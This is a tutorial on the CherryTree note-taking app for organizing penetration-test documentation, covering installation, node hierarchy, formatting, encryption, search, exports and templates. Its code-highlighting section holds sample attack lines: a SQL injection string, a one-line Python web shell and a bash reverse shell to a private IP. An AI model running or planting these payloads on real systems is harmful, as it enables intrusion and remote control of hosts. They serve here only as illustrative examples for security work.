CherryTree

CherryTree is a powerful hierarchical note-taking application designed for organizing complex information, particularly popular among security professionals for documenting penetration testing engagements, vulnerability research, and incident response activities. It combines a tree-based organizational structure with rich text formatting, code highlighting, and strong encryption capabilities.

# Ubuntu/Debian
sudo apt-get install cherrytree

# Fedora/RHEL
sudo dnf install cherrytree

# Arch Linux
sudo pacman -S cherrytree

# Build from source
git clone https://github.com/giuspen/cherrytree.git
cd cherrytree
mkdir -p build && cd build
cmake ..
make
sudo make install

# Homebrew installation
brew install cherrytree

# Download from GitHub
# Get the .dmg from https://github.com/giuspen/cherrytree/releases
# (wget does not expand * wildcards in URLs)
# Open .dmg and drag to Applications

# Manual installation
git clone https://github.com/giuspen/cherrytree.git
cd cherrytree
mkdir build && cd build
cmake ..
make

# Download installer from GitHub
# https://github.com/giuspen/cherrytree/releases

# Portable version
# Download cherrytree-*-portable.zip
# Extract and run cherrytree.exe

# Chocolatey
choco install cherrytree

# Scoop
scoop install cherrytree

# Launch CherryTree
cherrytree

# Create new document (File > New)
# Or command line
cherrytree --new_doc pen-test-notes

Engagement Name (root)
├── Client Information
│   ├── Contact Details
│   └── Scope
├── Reconnaissance
│   ├── OSINT
│   ├── Network Scanning
│   └── Service Enumeration
├── Vulnerability Assessment
│   ├── Findings
│   └── Severity Analysis
├── Exploitation
│   ├── Successful Exploits
│   └── Failed Attempts
└── Reporting
    ├── Executive Summary
    └── Detailed Findings

# Using GUI: Right-click parent > New Child Node
# Or: Ctrl+N (new sibling), Ctrl+Shift+N (new child)

# Node naming conventions for penetration testing
Engagement_Name
├── 2026-04-20_Initial_Scan
├── 2026-04-21_Web_Testing
├── SQLi_Found_on_Login
└── RCE_Vulnerability_DB

# Drag and drop nodes to reorganize
# Right-click > Cut/Copy/Paste

# Collapse/Expand branches
# Click triangle next to parent node
# Ctrl+comma to collapse all
# Ctrl+period to expand all

# Navigate nodes
# Ctrl+Up/Down arrows - move between nodes
# Ctrl+Left/Right arrows - expand/collapse

# Access node properties
# Right-click node > Properties
# Or: Ctrl+Alt+Return

# Set node as:
# - Rich text (formatted text)
# - Plain text (monospace)
# - Code (syntax highlighting)
# - Table (structured data)

# Bold text
Ctrl+B or select text > Format menu

# Italic text
Ctrl+I or select text > Format menu

# Underline text
Ctrl+U or select text > Format menu

# Strikethrough
Ctrl+- or select text > Format menu

# Monospace (code)
Ctrl+E or Format > Monospace

# Large title
Select text > Format > Text Styles > Large Title

# Small title
Select text > Format > Text Styles > Small Title

# Emphasis (highlighted)
Select text > Format > Highlight Text

# Remove formatting
Select text > Format > Remove Formatting

# Change font
Select text > Format > Font Name

# Change font size
Select text > Format > Font Size

# Change text color
Select text > Format > Text Color > Choose color

# Change background color
Select text > Format > Background Color > Choose color

# Predefined colors for severity
# Red for high severity
# Orange for medium
# Yellow for low
# Green for informational

# Create code node
Right-click > Properties > Code

# Or use code markdown
```bash
your code here
```

In code node: Properties > Syntax highlight > [language]

### Supported Languages

```bash
# Common security-related languages
Languages menu in code properties:
- bash/shell
- python
- php
- sql
- javascript
- html
- xml
- json
- powershell
- sql (mysql, postgresql, mssql)
- c/c++
- java
- ruby
- perl
- go
- rust
```

# SQL Injection Example (marked as SQL)
SELECT * FROM users WHERE id=1 OR '1'='1';

# Web Shell Example (marked as Python)
import os
os.system(request.args.get('cmd'))

# Reverse Shell (marked as Bash)
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1

# Create table node
Right-click > Properties > Table

# Or insert table in rich text
Edit > Insert Table

# Specify rows and columns
Table properties dialog
- Set column count: 3
- Set initial rows: 5

| Host | Service | Vulnerability | Severity | Status |
|------|---------|---------------|----------|--------|
| 10.0.0.50 | HTTP | SQL Injection | High | Exploited |
| 10.0.0.51 | SSH | Weak Crypto | Medium | Noted |
| 10.0.0.52 | FTP | Default Creds | Critical | Escalated |

| CVE | Service | Affected Version | CVSS | Exploitable | Notes |
|-----|---------|------------------|------|-------------|-------|
| CVE-2024-1234 | Apache | 2.4.49 | 9.8 | Yes | RCE |
| CVE-2024-5678 | OpenSSL | 1.1.1 | 7.5 | Partial | TLS only |

| IP Address | Hostname | OS | Open Ports | Services |
|------------|----------|----|------------|----------|
| 192.168.1.1 | router | Linux | 22,80,443 | SSH,HTTP,HTTPS |
| 192.168.1.100 | workstation | Windows 10 | 139,445,3389 | SMB,RDP |
| 192.168.1.200 | server | Windows Server 2019 | 3306,5432,1433 | MySQL,PostgreSQL,MSSQL |

# Insert image in rich text node
Edit > Insert Image > Select file

# Supported formats
- PNG, JPEG, GIF, BMP, SVG

# Screenshots for evidence
# Take screenshot > Edit > Insert Image > screenshot.png

# Paste directly
# Paste screenshot > Edit > Paste > Image pasted automatically

# Create Screenshots subdirectory
├── Findings
│   ├── Screenshots
│   │   ├── SQLi_vulnerable_parameter.png
│   │   ├── Admin_panel_found.png
│   │   └── RCE_proof_of_concept.png
│   └── Description

# Attach files
Edit > Attach File

# Browse and select file
# File is embedded in document (increases file size)

# Common attachments
- Nmap XML output
- Burp Suite reports
- Metasploit logs

# Enable password protection
File > Properties > Encrypt

# Set password
Enter strong password (20+ characters recommended)

# Password-protected nodes
Right-click node > Properties > Encrypted

# Automatic lock after inactivity
Edit > Preferences > Security > Lock documents after 10 minutes

# Use strong password
- 20+ characters
- Mix uppercase, lowercase, numbers, symbols
- Avoid dictionary words

# Password storage
- Use password manager
- Never store password in notes
- Document recovery procedure

# Security implications
- No password recovery once set
- Lost password = lost data
- Regular backups essential

# Search all nodes
Ctrl+F or Edit > Find Text

# Search options
- Match case
- Regular expressions
- Whole words only

# Search results
- Lists matching nodes
- Click result to navigate
- Next/Previous buttons

# Search with regex
Edit > Find Text > Use Regular Expression

# Examples:
# IP addresses: \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b
# Email addresses: \b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b
# URLs: https?:\/\/[^\s]+
# CVE numbers: CVE-\d{4}-\d{4,}
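
The search patterns above, applied outside the GUI to a text export of the notes. This is an added example, not code from the original page or the CherryTree project; the sample notes are constructed and the function names are assumptions. IPv4 matches are validated with `ipaddress` because the pattern alone also accepts strings such as `999.12.0.1`.

```python
import ipaddress
import re

# Patterns from the search examples above; the e-mail TLD class is written
# [A-Za-z] because a "|" inside a character class is a literal pipe.
PATTERNS = {
    "ipv4": re.compile(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b"),
    "email": re.compile(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b"),
    "url": re.compile(r"https?:\/\/[^\s]+"),
    "cve": re.compile(r"CVE-\d{4}-\d{4,}"),
}

# Constructed sample standing in for a File > Export > Text File export.
SAMPLE_NOTES = """\
2026-04-16 initial scan: 10.0.0.50 (HTTP) and 10.0.0.51 (SSH)
Scanner build 999.12.0.1 is a version string, not a host
Contact admin@example.com, portal at https://example.com/login?id=1.
Apache 2.4.49 maps to CVE-2024-1234; OpenSSL 1.1.1 to CVE-2024-5678
Re-test 10.0.0.50 after remediation
"""


def valid_ipv4(candidate):
    """The pattern only checks shape; reject octets above 255."""
    try:
        ipaddress.IPv4Address(candidate)
        return True
    except ipaddress.AddressValueError:
        return False


def extract_indicators(text):
    """Return de-duplicated, sorted matches per indicator type."""
    found = {}
    for name, pattern in PATTERNS.items():
        matches = pattern.findall(text)
        if name == "ipv4":
            matches = [m for m in matches if valid_ipv4(m)]
        elif name == "url":
            # [^\s]+ swallows sentence punctuation that follows a URL.
            matches = [m.rstrip(".,;)") for m in matches]
        found[name] = sorted(set(matches))
    return found


if __name__ == "__main__":
    for kind, values in extract_indicators(SAMPLE_NOTES).items():
        print(f"{kind}: {', '.join(values)}")
```
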
# Jump to node
Ctrl+G or Edit > Go To

# Tree navigation
Ctrl+Up/Down - previous/next node
Ctrl+Left - parent node
Ctrl+Right - first child

# Home/End
Ctrl+Home - first node
Ctrl+End - last node

# Save (Ctrl+S)
File > Save

# Auto-save enabled by default
Edit > Preferences > Autosave

# Save frequency
- Every 1 minute (default)
- Adjustable

# Export as HTML
File > Export > HTML (single directory)

# Export as PDF
File > Export > PDF (requires wkhtmltopdf)

# Export as text
File > Export > Text File

# Export specific node
Right-click node > Export

# Export entire tree
File > Export > HTML/PDF/Text

# Manual backup
File > Save As > backup-location

# Automated backup script
# Copy CherryTree database
cp ~/.local/share/cherrytree/*.ctd ~/backups/

# Version control
# Use git for important notes
cd notes-directory
git init
git add .
git commit -m "CherryTree backup"

Reconnaissance
├── OSINT Findings
│   ├── Website Information
│   ├── Social Media Profiles
│   ├── Email Addresses
│   └── Technology Stack
├── DNS Enumeration
│   ├── A Records
│   ├── MX Records
│   ├── NS Records
│   └── Subdomain List
└── Public Vulnerability Data
    ├── Previously Published CVEs
    ├── Reported Vulnerabilities
    └── Public Exploits

Vulnerabilities
├── Critical Issues
│   ├── [High-Risk-Finding] RCE via Insecure Deserialization
│   │   ├── Proof of Concept
│   │   ├── Evidence (screenshot)
│   │   ├── Remediation
│   │   └── CVSS Score: 9.8
│   └── [Critical] Default Credentials on Admin Panel
├── High Issues
│   └── [SQL Injection] Authentication Bypass
└── Medium Issues
    └── [Weak Cryptography] Hardcoded API Key

Timeline
├── 2026-04-15
│   ├── Client kickoff meeting
│   ├── Scope discussion
│   └── Rules of engagement signed
├── 2026-04-16
│   ├── Reconnaissance phase started
│   ├── Initial network scan
│   └── 12 web applications identified
├── 2026-04-20
│   ├── Critical RCE found
│   ├── Client notified
│   └── Remediation plan provided
└── 2026-04-25
    ├── Re-testing completed
    └── All issues resolved

[Template Name: Penetration Test]
Engagement: [CLIENT_NAME]
├── Client Information
│   ├── Primary Contact: [NAME]
│   ├── Email: [EMAIL]
│   └── Phone: [PHONE]
├── Engagement Details
│   ├── Start Date: [DATE]
│   ├── End Date: [DATE]
│   ├── Budget: [AMOUNT]
│   └── Scope: [DESCRIPTION]
├── Findings Summary
│   ├── Total Vulnerabilities: 0
│   ├── Critical: 0
│   ├── High: 0
│   └── Medium: 0
└── Report Template
    ├── Executive Summary
    ├── Detailed Findings
    └── Recommendations

[Template Name: Bug Bounty Finding]
Vulnerability Report
├── Title: [VULNERABILITY_TYPE]
├── Severity: [CRITICAL|HIGH|MEDIUM|LOW]
├── CVSS Score: [SCORE]
├── Affected Component: [COMPONENT]
├── Proof of Concept
│   ├── Steps to Reproduce
│   ├── Code/Screenshots
│   └── Video Evidence
├── Impact Assessment
│   ├── Confidentiality Impact
│   ├── Integrity Impact
│   └── Availability Impact
├── Remediation
│   └── Suggested Fix
└── References
    └── [CVE/CWE/References]

# Access preferences
Edit > Preferences

# Text Editor
- Font selection
- Font size
- Tab width
- Auto-indent
- Spell check

# Colors and Theme
- Dark mode
- Light mode
- Custom syntax highlighting

# Behavior
- Auto-save interval
- Tree right/left click behavior
- Node creation defaults

Ctrl+N            - New sibling node
Ctrl+Shift+N      - New child node
Ctrl+D            - Delete node
Ctrl+U            - Move node up
Ctrl+Shift+U      - Move node down
Ctrl+L            - Move node left (decrease level)
Ctrl+R            - Move node right (increase level)
Ctrl+F            - Find text
Ctrl+H            - Replace text
Ctrl+B            - Bold
Ctrl+I            - Italic
Ctrl+U            - Underline
Ctrl+E            - Monospace
Ctrl+S            - Save

# View document information
File > Document Statistics

# Displays:
- Total nodes
- Total links
- Total images
- Document size
- Last modified date

# Use consistent naming
- Prefix with date: 2026-04-15_Task_Name
- Use underscores instead of spaces
- Descriptive titles

# Deep hierarchy (good for complex engagements)
# Shallow hierarchy (good for quick reference)
# Mixed approach (recommended)

# Color-code nodes
# Use node icons for quick visual identification

# Encrypt sensitive documents
# Use strong passwords
# Regular backups to encrypted location
# Never leave unencrypted notes on shared systems
# Clean temporary files after export

# Use templates for recurring tasks
# Create quick-reference nodes
# Link related findings together
# Use tables for structured data
# Regular review and archival

# Engagement close-out
# Archive completed engagement documents
# Export final reports
# Update lessons learned

# Copy nmap results
nmap -sV target > nmap-results.txt

# Paste into CherryTree code node
# Paste formatted output
# Set syntax highlighting to 'text'

# Export from Burp as HTML
# Copy relevant findings
# Paste into appropriate nodes
# Add custom analysis and notes

# Or save findings in table format
| Issue | Severity | Confidence | Details |
|-------|----------|------------|---------|

# Export module information
msfconsole > hosts
msfconsole > services

# Copy output to CherryTree
# Use code blocks for commands
# Document successful exploits

# Check file integrity
file ~/.local/share/cherrytree/*.ctd

# Recover from backup
cp ~/backups/document.ctd ~/.local/share/cherrytree/

# Export and reimport
File > Export > HTML
# Create new document
# Manually copy content back
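
The backup script earlier on this page and the recover-from-backup step above, extended with a SHA-256 manifest so a copy can be checked before it overwrites the working document. This is an added example, not code from the original page or the CherryTree project; it relies on CherryTree's storage types (`.ctd`/`.ctb` unprotected, `.ctz`/`.ctx` password protected), and the directory layout, `manifest.json` name and function names are assumptions.

```python
import hashlib
import json
import os
import shutil
from pathlib import Path

# CherryTree storage types: .ctd (XML) and .ctb (SQLite) are not password
# protected; .ctz and .ctx are their password-protected counterparts.
UNPROTECTED = {".ctd", ".ctb"}
PROTECTED = {".ctz", ".ctx"}


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def backup_documents(src_dir, dest_dir):
    """Copy CherryTree documents, record hashes, flag unprotected formats."""
    dest = Path(dest_dir)
    dest.mkdir(parents=True, exist_ok=True)
    os.chmod(dest, 0o700)  # owner-only: notes hold client data
    manifest = {}
    for src in sorted(Path(src_dir).iterdir()):
        if not src.is_file() or src.suffix not in UNPROTECTED | PROTECTED:
            continue
        copy = dest / src.name
        shutil.copy2(src, copy)
        os.chmod(copy, 0o600)
        manifest[src.name] = {
            "sha256": sha256_file(copy),
            "password_protected": src.suffix in PROTECTED,
        }
    manifest_path = dest / "manifest.json"
    manifest_path.write_text(json.dumps(manifest, indent=2))
    os.chmod(manifest_path, 0o600)
    return manifest


def verify_backup(dest_dir):
    """Return names that are missing or whose hash no longer matches."""
    dest = Path(dest_dir)
    manifest = json.loads((dest / "manifest.json").read_text())
    return [name for name, entry in manifest.items()
            if not (dest / name).is_file()
            or sha256_file(dest / name) != entry["sha256"]]
```

The manifest sits beside the copies, so it catches corruption and partial copies rather than deliberate tampering; entries with `password_protected` set to false are the ones that need an encrypted backup location.
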
# Large documents may slow down
# Break into multiple documents
# Archive old engagements

# Clear cache
rm -rf ~/.cache/cherrytree/

# Restart application
# Reduce image/attachment size

# No built-in password recovery
# If password lost, document is inaccessible
# Prevention:
# - Store password in password manager
# - Create recovery procedure
# - Test recovery regularly
# - Backup before encrypting

CherryTree provides a flexible, secure platform for organizing complex security research and penetration testing documentation. Its hierarchical structure, rich formatting options, and encryption capabilities make it an essential tool in the security professional’s toolkit for evidence collection, findings documentation, and engagement management.